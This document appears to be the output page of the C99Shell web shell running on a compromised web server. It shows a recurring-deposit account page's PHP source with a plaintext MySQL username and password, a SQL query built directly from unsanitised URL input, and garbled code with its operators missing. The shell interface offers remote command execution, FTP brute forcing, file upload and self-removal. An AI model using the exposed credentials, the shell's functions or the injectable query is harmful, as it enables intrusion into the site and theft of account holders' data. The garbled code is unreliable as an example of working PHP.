!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/studentlogin/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     maturityamountrd.php (14.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php include('session.php'); ?>
<?php 
include ('receipt2.php'); ?>
<?php 
include ('account_rd.php'); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Account Create</title>


<script src="SpryAssets/SpryMenuBar.js" type="text/javascript"></script>
<link href="SpryAssets/SpryMenuBarHorizontal.css" rel="stylesheet" type="text/css" />
 <style type="text/css">
table {
    border: 0px solid green;
    border-collapse: collapse;
    width:100%;
}

table td {
    border: 0px solid green;
}

table td.shrink {
    white-space:nowrap
}
table td.expand {
    width: 99%
}
</style>
<style>

.table
{

table-layout:fixed;
width:500px;

border-collapse:collapse;

}

.header th
{

font-family:Calibri;
font-size:small;
font-weight:lighter;

border-left:1px solid #000;
background:#d0d0d0;

}

.body_panel
{

display:inline-block;
width:520px;
height:300px;
overflow-y:scroll;

}

.body tr
{

border-bottom:1px solid #d0d0d0;

}

.body td
{

border-left:1px solid #d0d0d0;
padding-left:3px;

font-family:Calibri;
font-size:small;

overflow:hidden;
white-space:nowrap;
text-overflow:ellipsis;

}
</style>
<script language="JavaScript" type="text/javascript">
<!--

function Toggle(obj){
 var val=obj.value;
 if (!obj.m){ obj.m=''; }
 if (!obj.m.match(val)){ obj.m+=','+val+','; }
 var hide=obj.m.split(',');
 for (var zxc0=0;zxc0<hide.length;zxc0++){
  if (document.getElementById(hide[zxc0])){
   document.getElementById(hide[zxc0]).style.display='none';
  }
 }
 var show=val.split(',');
 for (var zxc1=0;zxc1<show.length;zxc1++){
  if (document.getElementById(show[zxc1])){
   document.getElementById(show[zxc1]).style.display='';
  }
 }
}

//-->
</script>
</head>
<center>
<body>
<table width="100%" border="0"  bgcolor="#FFFFFF">
  <tr>
    <td ><?php include('header.php'); ?></td>
   
   </tr>
  <tr>
    <td colspan="3"> 
    
    <table width="1030" border="0">
      <tr>
        <td colspan="3" bgcolor="#CCCCCC"><?php include('menubar.php'); ?></td>
      </tr>
      <tr>
        <td width="210" bgcolor="#6699CC">Welcome <?php echo $user ?></td>
        <td width="335" bgcolor="#6699CC"><a href="logout.php">Logout</a></td>
        <td width="386" bgcolor="#6699CC"></td>
      </tr>
    </table>
    </td>
   </tr>
   <tr>
   <td colspan="2" align="left">
 
        </td>
        </tr>
  <tr>
    <td colspan="2"> </td> </tr>
  <tr>
    <td colspan="2">
 
 
      
</td>
</tr>
     <tr>
      <td colspan="2"></td></tr>
  <tr>
    <td colspan="2"></td> </tr>
  <tr>
    <td colspan="3" bgcolor="#33FF66">Search Account No::
       <form action="" method="get" name="form">
       <?php
// Create connection
$con=mysqli_connect("localhost","sarkmicr_user","rb!sar838","sarkmicr_data");

    
// Check connection
    
if (mysqli_connect_errno())

// Check connection
if (mysqli_connect_errno())
  {
  echo 
"Failed to connect to MySQL: " mysqli_connect_error();
  } else {
    echo 
"We are connected.";
    }

    
$result mysqli_query($con,"SELECT DISTINCT acc_no FROM  rd ");
 
?> 
      <select name="q"   id="q" >
  <?
    
while($row mysqli_fetch_array($result))
    {
      echo 
"<option value='" $row['acc_no'] . "'>" $row['acc_no'] . "</option>";
    }
  
?>
  </select>
        <input type="submit" name="Submit" value="Search" />
        
         </form>
        
    <?php

  
// Get the search variable from URL

  
$var = @$_GET['q'] ;
  
$trimmed trim($var);
  
  
   
//trim whitespace from the stored variable

// rows to return
$limit=10

// check for an empty string and display a message.
if ($trimmed == "")
  {
 
  exit;
  }

// check for a search parameter
if (!isset($var))
  {
  echo 
"<p>We dont seem to have a search parameter!</p>";
  exit;
  }

mysql_connect("localhost","sarkmicr_user","rb!sar838"); //(host, username, password)

//specify database ** EDIT REQUIRED HERE **
mysql_select_db("sarkmicr_data") or die("Unable to select database"); //select which database we're using


$field 'acc_no';

// Build SQL Query  
$query "select * from rd where $field like \"$trimmed\"  AND main='MAIN'
order by ID"
// EDIT HERE and specify your table and field names for the SQL query

$numresults=mysql_query($query);
$numrows=mysql_num_rows($numresults);

// If we have no results, offer a google search as an alternative

if ($numrows == 0)
  {
  
  


  }

// next determine if s has been passed to script, if not use 0
  
if (empty($s)) {
  
$s=0;
  }

// get results
  
$query .= " limit $s,$limit";
  
$result mysql_query($query) or die("Couldn't execute query");



// begin to show results set

// begin to show results set
$count $s ;

// now you can display the results returned
  
while ($rowmysql_fetch_array($result))
   {
$accounnot=$row[acc_no]; 
$names="'".$row[cname]."'"
$fname="'".$row[fname]."'"
$village="'".$row[address]."'";
$nomineename="'".$row[nominee_name]."'";
$nomineerelation="'".$row[nomineeralation]."'";
$mcode=$row[mcode];
$totalamount=$row[totalamount];
$amount=$row[amount];
$planttime=$row[plan_time];
 
  
$count++ ;
  }

$currPage = (($s/$limit) + 1);

//break before paging
  
echo "";

  
// next we need to do the links to other results
  
if ($s>=1) { // bypass PREV link if s is 0
  
$prevs=($s-$limit);
  print 
"<a href=\"$PHP_SELF?s=$prevs&q=$var\">&lt;&lt; 
  Prev 10</a>&nbsp"
;
  }

// calculate number of pages needing links
  
$pages=intval($numrows/$limit);

// $pages now contains int of pages needed unless there is a remainder from division

?>  
         
         
         
         
         
         
      </td>
  </tr>
  <tr>
    <td colspan="3" bgcolor="#6666CC">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="3" bgcolor="#66CCFF">
     <form action="mathurityamountprintfd.php" method="post">
     <table width="1030" border="0">
        <tr>
          <td align="left" bgcolor="#66CCFF">Laser No</td>
          <td colspan="5" align="left" bgcolor="#66CCFF"><input name="lano" type="text"   id="lano" tabindex="1"  size="50" maxlength="20"  required="required"   /></td>
        </tr>
        <tr>
          <td align="left" bgcolor="#66CCFF">Account No</td>
          <td colspan="5" align="left" bgcolor="#66CCFF"><input name="account" type="text"   id="account" tabindex="1"  size="50" maxlength="20"  required="required" value=" <?PHP echo $accounnot ?> " /></td>
          </tr>
        <tr>
          <td width="141" align="left" bgcolor="#66CCFF">Name</td>
          <td colspan="4" align="left" bgcolor="#66CCFF"><input   name="cname" type="text" id="cname" size="60" maxlength="80" value=<?php echo $names ?>  />    </td>
          <td width="182" align="left" bgcolor="#66CCFF"><label for="textfield"></label>
            <label for="textfield14"></label></td>
        </tr>
        <tr>
          <td align="left" bgcolor="#66CCFF">Father Name</td>
          <td colspan="5" align="left" bgcolor="#66CCFF"><input  name="fname" type="text" id="fname" size="60" maxlength="80"  value=<?php echo $fname ?> /></td>
          </tr>
        <tr>
          <td height="38" align="left" bgcolor="#66CCFF">Join Date</td>
          <td colspan="2" align="left" bgcolor="#66CCFF"><select name="jdate" size="1" id="da">
          <option><?php echo date(d?></option>
            <option>01</option>
            <option>02</option>
            <option>03</option>
            <option>04</option>
            <option>05</option>
            <option>06</option>
            <option>07</option>
            <option>08</option>
            <option>09</option>
            <option>10</option>
            <option>11</option>
            <option>12</option>
            <option>13</option>
            <option>14</option>
            <option>15</option>
            <option>16</option>
            <option>17</option>
            <option>18</option>
            <option>19</option>
            <option>20</option>
            <option>21</option>
            <option>22</option>
            <option>23</option>
            <option>24</option>
            <option>25</option>
            <option>26</option>
            <option>27</option>
            <option>28</option>
            <option>29</option>
            <option>30</option>
            <option>31</option>
            </select>
            <select name="jmonth" id="jmonth">
             <option><?php echo date(m?></option>
              <option>01</option>
              <option>02</option>
              <option>03</option>
              <option>04</option>
              <option>05</option>
              <option>06</option>
              <option>07</option>
              <option>08</option>
              <option>09</option>
              <option>10</option>
              <option>11</option>
              <option>12</option>
              </select>
            <select name="jyear" id="jyear">
             <option><?php echo date(Y?></option>
              <option>2014</option>
              <option>2015</option>
              <option>2016</option>
              <option>2017</option>
              <option>2018</option>
              <option>2019</option>
              <option>2020</option>
            </select></td>
          <td width="199" align="left" bgcolor="#66CCFF">&nbsp;</td>
          <td width="123" align="left" bgcolor="#66CCFF">Maturity Date</td>
          <td align="left" bgcolor="#66CCFF"><select name="mdate" size="1" id="da">
          <option><?php echo date(d?></option>
            <option>01</option>
            <option>02</option>
            <option>03</option>
            <option>04</option>
            <option>05</option>
            <option>06</option>
            <option>07</option>
            <option>08</option>
            <option>09</option>
            <option>10</option>
            <option>11</option>
            <option>12</option>
            <option>13</option>
            <option>14</option>
            <option>15</option>
            <option>16</option>
            <option>17</option>
            <option>18</option>
            <option>19</option>
            <option>20</option>
            <option>21</option>
            <option>22</option>
            <option>23</option>
            <option>24</option>
            <option>25</option>
            <option>26</option>
            <option>27</option>
            <option>28</option>
            <option>29</option>
            <option>30</option>
            <option>31</option>
            </select>
            <select name="mmonth" id="mmonth">
             <option><?php echo date(m?></option>
              <option>01</option>
              <option>02</option>
              <option>03</option>
              <option>04</option>
              <option>05</option>
              <option>06</option>
              <option>07</option>
              <option>08</option>
              <option>09</option>
              <option>10</option>
              <option>11</option>
              <option>12</option>
              </select>
            <select name="myear" id="myear">
             <option><?php echo date(Y?></option>
              <option>2014</option>
              <option>2015</option>
              <option>2016</option>
              <option>2017</option>
              <option>2018</option>
              <option>2019</option>
              <option>2020</option>
               <option>2021</option>
              <option>2022</option>
              <option>2023</option>
              <option>2024</option>
               <option>2025</option>
              <option>2026</option>
              <option>2028</option>
              <option>2029</option>
                <option>2030</option>
            </select></td>
          </tr>
        <tr>
          <td height="37" align="left" bgcolor="#66CCFF">Village</td>
          <td colspan="5" align="left" bgcolor="#66CCFF"><input  name="village" type="text"  id="village" tabindex="3" size="90" maxlength="80"  value=<?php echo $village ?>/></td>
          </tr>
        <tr>
          <td align="left" bgcolor="#66CCFF">Nominee Name</td>
          <td width="144" align="left" bgcolor="#66CCFF">
            <input type="text" name="nominee_name" id="nominee_name"  tabindex="12"   value=<?php echo $nomineename ?> /></td>
          <td width="129" align="left" bgcolor="#66CCFF">Nominee Relation</td>
          <td align="left" bgcolor="#66CCFF">
            <input type="text" name="nomineerelation" id="nomineerelation"  tabindex="14" value=<?php echo $nomineerelation ?> />
          </td>
          <td align="left" bgcolor="#66CCFF">Member Code</td>
          <td align="left" bgcolor="#66CCFF">
            <input type="text" name="mcode" id="mcode"  tabindex="15"  value="<?php echo $mcode ?>" />
          </td>
        </tr>
        <tr>
          <td align="left" bgcolor="#66CCFF">Maturity Amount</td>
          <td align="left" bgcolor="#66CCFF"><input name= "amount2" id="amount2"  required="required" value="<?php echo $totalamount ?>" /></td>
          <td align="left" bgcolor="#66CCFF">&nbsp;</td>
          <td colspan="3" align="left" bgcolor="#66CCFF">&nbsp;</td>
         </tr>
        <tr>
          <td align="left" bgcolor="#66CCFF">Premium Amount</td>
          <td bgcolor="#66CCFF"  align="left" valign="top">
            <input name= "pamount" id="pamount"  required="required"  value="<?php echo $amount ?>" >
            
            
            </td>
          <td align="left" bgcolor="#66CCFF">
             Plan No/Name</td>
          <td align="left" bgcolor="#66CCFF"><input type="text" name="planno" id="planno"  tabindex="14"  value= <?php echo "RD" ?> readonly="readonly" /></td>
          <td align="left" bgcolor="#66CCFF">Rate</td>
          <td align="left" bgcolor="#66CCFF"><input type="text" name="rate" id="rate"  tabindex="15" required="required" /></td>
        </tr>
        <tr>
          <td align="left">Plan Time</td>
          <td align="left"><input name= "ptime" id="ptime"  required="required" value="<?php echo $planttime ?>" />Months</td>
          <td align="left">&nbsp;</td>
          <td align="left">&nbsp;</td>
          <td align="left"><input type="submit" name="ADD" id="ADD" value="ADD" tabindex="22" class="button"/></td>
          <td align="left">&nbsp;</td>
        </tr>
      </table>
    </form>
       </td>
    </tr>
     
</table>
 </form>

</body></center>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0022 ]--